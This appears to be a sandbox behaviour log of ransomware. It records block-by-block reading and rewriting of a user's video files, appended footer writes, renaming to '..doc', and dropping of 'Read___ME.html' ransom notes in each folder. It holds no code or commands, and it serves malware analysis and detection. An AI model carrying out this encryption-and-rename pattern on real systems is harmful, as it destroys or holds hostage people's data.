File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\NY17G87uN.mkv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\NY17G87uN.mkv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\NY17G87uN.mkv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\NY17G87uN.mkv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\NY17G87uN.mkv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\NY17G87uN.mkv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\NY17G87uN.mkv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\NY17G87uN.mkv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\NY17G87uN.mkv, size = 8192, size_out = 7646	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\NY17G87uN.mkv, size = 7648	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\NY17G87uN.mkv, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\NY17G87uN.mkv, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\NY17G87uN.mkv, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\NY17G87uN.mkv, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Videos\NY17G87uN.mkv, destination_filename = C:\Users\CIiHmnxMn6Ps\Videos\NY17G87uN.mkv..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\P1l10Vzx4hd3-C.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\P1l10Vzx4hd3-C.mp4, type = size, size_out = 7057	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\P1l10Vzx4hd3-C.mp4, size = 8192, size_out = 7057	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\P1l10Vzx4hd3-C.mp4, size = 7072	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\P1l10Vzx4hd3-C.mp4, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\P1l10Vzx4hd3-C.mp4, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\P1l10Vzx4hd3-C.mp4, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\P1l10Vzx4hd3-C.mp4, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Videos\P1l10Vzx4hd3-C.mp4, destination_filename = C:\Users\CIiHmnxMn6Ps\Videos\P1l10Vzx4hd3-C.mp4..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\U8xibbuO9vCag.mkv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\U8xibbuO9vCag.mkv, type = size, size_out = 47050	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\U8xibbuO9vCag.mkv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\U8xibbuO9vCag.mkv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\U8xibbuO9vCag.mkv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\U8xibbuO9vCag.mkv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\U8xibbuO9vCag.mkv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\U8xibbuO9vCag.mkv, size = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\U8xibbuO9vCag.mkv, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\U8xibbuO9vCag.mkv, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\U8xibbuO9vCag.mkv, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\U8xibbuO9vCag.mkv, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Videos\U8xibbuO9vCag.mkv, destination_filename = C:\Users\CIiHmnxMn6Ps\Videos\U8xibbuO9vCag.mkv..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cpcCB0B.swf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cpcCB0B.swf, type = size, size_out = 13875	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cpcCB0B.swf, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cpcCB0B.swf, size = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cpcCB0B.swf, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cpcCB0B.swf, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cpcCB0B.swf, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cpcCB0B.swf, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cpcCB0B.swf, destination_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cpcCB0B.swf..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\Read___ME.html, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\Read___ME.html, size = 4282	1	Fn Data
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\pglUhoTAS6kwMMFsDl.swf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\pglUhoTAS6kwMMFsDl.swf, type = size, size_out = 64527	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\pglUhoTAS6kwMMFsDl.swf, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\pglUhoTAS6kwMMFsDl.swf, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\pglUhoTAS6kwMMFsDl.swf, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\pglUhoTAS6kwMMFsDl.swf, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\pglUhoTAS6kwMMFsDl.swf, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\pglUhoTAS6kwMMFsDl.swf, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\pglUhoTAS6kwMMFsDl.swf, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\pglUhoTAS6kwMMFsDl.swf, size = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\pglUhoTAS6kwMMFsDl.swf, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\pglUhoTAS6kwMMFsDl.swf, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\pglUhoTAS6kwMMFsDl.swf, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\pglUhoTAS6kwMMFsDl.swf, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\pglUhoTAS6kwMMFsDl.swf, destination_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\pglUhoTAS6kwMMFsDl.swf..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6e5-HpMrbS.mkv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6e5-HpMrbS.mkv, type = size, size_out = 10256	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6e5-HpMrbS.mkv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6e5-HpMrbS.mkv, size = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6e5-HpMrbS.mkv, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6e5-HpMrbS.mkv, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6e5-HpMrbS.mkv, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6e5-HpMrbS.mkv, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6e5-HpMrbS.mkv, destination_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6e5-HpMrbS.mkv..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\Read___ME.html, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\Read___ME.html, size = 4282	1	Fn Data
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6gwG.flv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6gwG.flv, type = size, size_out = 99265	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6gwG.flv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6gwG.flv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6gwG.flv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6gwG.flv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6gwG.flv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6gwG.flv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6gwG.flv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6gwG.flv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6gwG.flv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6gwG.flv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6gwG.flv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6gwG.flv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6gwG.flv, size = 8192, size_out = 961	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6gwG.flv, size = 976	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6gwG.flv, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6gwG.flv, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6gwG.flv, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6gwG.flv, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6gwG.flv, destination_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\6gwG.flv..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\gxfzekk51.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\gxfzekk51.mp4, type = size, size_out = 85112	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\gxfzekk51.mp4, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\gxfzekk51.mp4, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\gxfzekk51.mp4, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\gxfzekk51.mp4, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\gxfzekk51.mp4, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\gxfzekk51.mp4, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\gxfzekk51.mp4, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\gxfzekk51.mp4, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\gxfzekk51.mp4, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\gxfzekk51.mp4, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\gxfzekk51.mp4, size = 8192, size_out = 3192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\gxfzekk51.mp4, size = 3200	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\gxfzekk51.mp4, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\gxfzekk51.mp4, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\gxfzekk51.mp4, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\gxfzekk51.mp4, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\gxfzekk51.mp4, destination_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\gxfzekk51.mp4..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\lI6eAu1sqq2.mkv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\lI6eAu1sqq2.mkv, type = size, size_out = 99025	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\lI6eAu1sqq2.mkv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\lI6eAu1sqq2.mkv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\lI6eAu1sqq2.mkv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\lI6eAu1sqq2.mkv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\lI6eAu1sqq2.mkv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\lI6eAu1sqq2.mkv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\lI6eAu1sqq2.mkv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\lI6eAu1sqq2.mkv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\lI6eAu1sqq2.mkv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\lI6eAu1sqq2.mkv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\lI6eAu1sqq2.mkv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\lI6eAu1sqq2.mkv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\lI6eAu1sqq2.mkv, size = 8192, size_out = 721	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\lI6eAu1sqq2.mkv, size = 736	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\lI6eAu1sqq2.mkv, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\lI6eAu1sqq2.mkv, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\lI6eAu1sqq2.mkv, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\lI6eAu1sqq2.mkv, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\lI6eAu1sqq2.mkv, destination_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\lI6eAu1sqq2.mkv..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\P17XSZAU6p5neX19v.mkv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\P17XSZAU6p5neX19v.mkv, type = size, size_out = 79144	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\P17XSZAU6p5neX19v.mkv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\P17XSZAU6p5neX19v.mkv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\P17XSZAU6p5neX19v.mkv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\P17XSZAU6p5neX19v.mkv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\P17XSZAU6p5neX19v.mkv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\P17XSZAU6p5neX19v.mkv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\P17XSZAU6p5neX19v.mkv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\P17XSZAU6p5neX19v.mkv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\P17XSZAU6p5neX19v.mkv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\P17XSZAU6p5neX19v.mkv, size = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\P17XSZAU6p5neX19v.mkv, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\P17XSZAU6p5neX19v.mkv, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\P17XSZAU6p5neX19v.mkv, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\P17XSZAU6p5neX19v.mkv, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\P17XSZAU6p5neX19v.mkv, destination_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\P17XSZAU6p5neX19v.mkv..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\qopWQzK.mkv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\qopWQzK.mkv, type = size, size_out = 14293	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\qopWQzK.mkv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\qopWQzK.mkv, size = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\qopWQzK.mkv, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\qopWQzK.mkv, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\gPYspNB\qopWQzK.mkv, size = 128	1	Fn Data
